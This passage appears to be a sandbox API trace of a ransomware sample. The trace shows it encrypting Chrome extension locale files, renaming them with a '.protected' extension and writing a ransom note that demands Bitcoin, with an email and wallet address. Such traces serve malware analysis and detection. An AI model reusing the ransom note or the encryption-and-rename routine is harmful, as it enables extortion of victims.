dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.728] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.728] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.728] CloseHandle (hObject=0x168) returned 1 [0079.728] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.protected") returned 167 [0079.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.protected")) returned 1 [0079.729] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.729] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.729] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\RESTORE_FILES.txt") returned 161 [0079.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.729] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.729] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.730] lstrlenA (lpString="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") returned 684 [0079.730] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.730] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.730] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.730] CloseHandle (hObject=0x164) returned 1 [0079.730] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.730] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0079.730] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0079.730] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0079.730] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0079.730] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0079.730] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el") returned 143 [0079.731] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0079.731] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0079.731] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\*") returned 145 [0079.731] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.731] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.731] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.731] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.731] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.731] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.731] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\.") returned 145 [0079.731] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.731] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.731] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.731] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.731] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.731] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.731] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.731] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\..") returned 146 [0079.731] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.731] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.731] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.731] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.731] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.731] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.731] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.731] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.731] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json") returned 157 [0079.731] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.731] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.731] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.731] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json") returned 157 [0079.732] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json") returned 157 [0079.732] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json") returned 157 [0079.732] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.732] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.732] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.732] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.733] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.733] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.733] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.733] CloseHandle (hObject=0x168) returned 1 [0079.733] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.protected") returned 167 [0079.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.protected")) returned 1 [0079.733] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.734] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.734] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\RESTORE_FILES.txt") returned 161 [0079.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.734] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.734] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.735] lstrlenA (lpString="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") returned 684 [0079.735] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.735] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.735] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.735] CloseHandle (hObject=0x164) returned 1 [0079.735] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.735] lstrcmpiW (lpString1="en", lpString2="Windows") returned -1 [0079.735] lstrcmpiW (lpString1="en", lpString2="Program Files") returned -1 [0079.735] lstrcmpiW (lpString1="en", lpString2="Program Files (x86)") returned -1 [0079.735] lstrcmpiW (lpString1="en", lpString2="$Recycle.bin") returned 1 [0079.735] lstrcmpiW (lpString1="en", lpString2="System Volume Information") returned -1 [0079.735] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en") returned 143 [0079.735] lstrcmpW (lpString1="en", lpString2=".") returned 1 [0079.735] lstrcmpW (lpString1="en", lpString2="..") returned 1 [0079.735] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\*") returned 145 [0079.735] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.736] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.736] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.736] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.736] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.736] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.736] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\.") returned 145 [0079.736] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.736] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.736] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.736] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.736] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.736] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.736] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.736] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\..") returned 146 [0079.736] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.736] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.736] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.736] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.736] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.736] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.736] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.736] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.736] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json") returned 157 [0079.736] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.736] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.736] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.736] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.736] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json") returned 157 [0079.736] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.737] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json") returned 157 [0079.737] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.737] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json") returned 157 [0079.737] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.737] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.737] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.737] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.737] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.738] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.738] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.738] CloseHandle (hObject=0x168) returned 1 [0079.738] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.protected") returned 167 [0079.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.protected")) returned 1 [0079.738] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.738] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.738] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\RESTORE_FILES.txt") returned 161 [0079.738] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 